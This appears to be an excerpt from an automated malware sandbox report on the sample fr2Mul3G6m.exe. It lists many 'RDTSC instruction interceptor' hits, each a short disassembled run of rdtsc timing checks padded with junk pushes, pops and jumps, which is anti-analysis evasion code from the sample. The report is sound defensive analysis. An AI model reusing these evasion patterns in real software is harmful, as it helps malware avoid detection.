                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 489D6A second address: 489D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 489EF0 second address: 489F09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 48A36D second address: 48A396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B213h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jne 00007FBF0920B216h 0x00000010 je 00007FBF0920B208h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 488B78 second address: 488B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF093632EBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 488B87 second address: 488B8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 488B8B second address: 488B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 488B91 second address: 488B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 488B9A second address: 488BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ebx 0x0000000a js 00007FBF09363317h 0x00000010 pushad 0x00000011 jnc 00007FBF093632E6h 0x00000017 jmp 00007FBF093632F7h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 48D5DD second address: 48D5ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF0920B20Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 48D5ED second address: 48D5F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 48D5F2 second address: 48D5FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 48FF29 second address: 48FF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 490077 second address: 49008D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B212h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49008D second address: 490095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4901E6 second address: 4901EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 492634 second address: 492639 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 492639 second address: 492641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 498139 second address: 49813F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49813F second address: 49819A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBF0920B206h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FBF0920B219h 0x00000011 jmp 00007FBF0920B20Eh 0x00000016 pop eax 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b jmp 00007FBF0920B20Ah 0x00000020 pop esi 0x00000021 pushad 0x00000022 jmp 00007FBF0920B215h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49819A second address: 4981B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBF093632E6h 0x0000000a jmp 00007FBF093632F3h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4975CD second address: 4975D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 497891 second address: 4978B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F2h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FBF093632E6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4978B1 second address: 4978B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4978B7 second address: 4978CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF093632EFh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 497CD5 second address: 497CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 497CDA second address: 497CE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 497CE0 second address: 497CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49B25D second address: 49B261 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49B261 second address: 49B267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49B267 second address: 49B271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49B271 second address: 49B291 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B20Ah 0x00000007 jmp 00007FBF0920B212h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49B291 second address: 49B2A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jbe 00007FBF093632E6h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FBF093632E6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49A9DA second address: 49A9F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49AB73 second address: 49AB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF093632F9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A0E26 second address: 4A0E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A0E2C second address: 4A0E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A0E30 second address: 4A0E56 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBF0920B206h 0x00000008 jmp 00007FBF0920B214h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FBF0920B206h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49F8FB second address: 49F912 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF093632EAh 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49F912 second address: 49F917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49FA6C second address: 49FA80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FBF093632E6h 0x0000000e jnl 00007FBF093632E6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49FA80 second address: 49FA84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49FA84 second address: 49FA98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FBF093632ECh 0x0000000e jl 00007FBF093632E6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49FBE6 second address: 49FBEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49FBEA second address: 49FBF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49FBF0 second address: 49FC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a js 00007FBF0920B206h 0x00000010 jno 00007FBF0920B206h 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49FC0D second address: 49FC11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49FC11 second address: 49FC19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49FC19 second address: 49FC2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF093632EDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4401E5 second address: 44021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FBF0920B206h 0x00000009 jmp 00007FBF0920B216h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FBF0920B210h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44021C second address: 440226 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF093632E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 440226 second address: 44024D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007FBF0920B206h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edx, eax 0x0000000f mov cx, 32C1h 0x00000013 mov ebx, dword ptr [ebp+1247B318h] 0x00000019 push edi 0x0000001a pop ecx 0x0000001b add eax, ebx 0x0000001d mov dx, 8521h 0x00000021 push eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44024D second address: 440251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 440251 second address: 440255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 440255 second address: 44029C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF093632F9h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f sbb ecx, 324BA966h 0x00000015 push 00000004h 0x00000017 mov dword ptr [ebp+122D1FE2h], eax 0x0000001d nop 0x0000001e push edx 0x0000001f jl 00007FBF093632E8h 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 pop edx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jo 00007FBF093632ECh 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44029C second address: 4402A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A000B second address: 4A000F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A000F second address: 4A0035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF0920B20Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jmp 00007FBF0920B20Eh 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A0B01 second address: 4A0B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A0B05 second address: 4A0B15 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBF0920B206h 0x00000008 jnc 00007FBF0920B206h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A80DD second address: 4A8140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jp 00007FBF093632E6h 0x0000000c pop edx 0x0000000d pushad 0x0000000e jmp 00007FBF093632ECh 0x00000013 jmp 00007FBF093632F6h 0x00000018 jmp 00007FBF093632F9h 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 jnl 00007FBF093632E8h 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 jo 00007FBF093632ECh 0x0000002e jo 00007FBF093632E6h 0x00000034 push ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A6657 second address: 4A6664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 js 00007FBF0920B208h 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A6977 second address: 4A6991 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBF093632F2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A6C2E second address: 4A6C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A6C32 second address: 4A6C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A6C36 second address: 4A6C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBF0920B213h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A6EF2 second address: 4A6EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A6EFD second address: 4A6F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A74A8 second address: 4A74BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pushad 0x00000007 jns 00007FBF093632EAh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A7DD1 second address: 4A7DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A7DD6 second address: 4A7DE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF093632EAh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4ABEE4 second address: 4ABEEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4AC0A8 second address: 4AC0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF093632EBh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4AC214 second address: 4AC218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4AC218 second address: 4AC23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FBF093632F9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4AC692 second address: 4AC69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBF0920B206h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4AC69E second address: 4AC6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4AC9D5 second address: 4AC9E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF0920B20Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4AC9E6 second address: 4AC9EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4AC9EA second address: 4AC9FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBF0920B20Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B740E second address: 4B7417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B7417 second address: 4B741D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B741D second address: 4B7421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B7421 second address: 4B743D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBF0920B210h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B743D second address: 4B744C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B744C second address: 4B7454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B7454 second address: 4B7464 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FBF093632EBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B75B7 second address: 4B761F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jc 00007FBF0920B206h 0x0000000f jmp 00007FBF0920B211h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007FBF0920B21Fh 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FBF0920B20Ch 0x00000026 jmp 00007FBF0920B216h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B761F second address: 4B7625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B7625 second address: 4B762B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B762B second address: 4B7632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B7632 second address: 4B7638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B78DE second address: 4B78E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B7A28 second address: 4B7A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
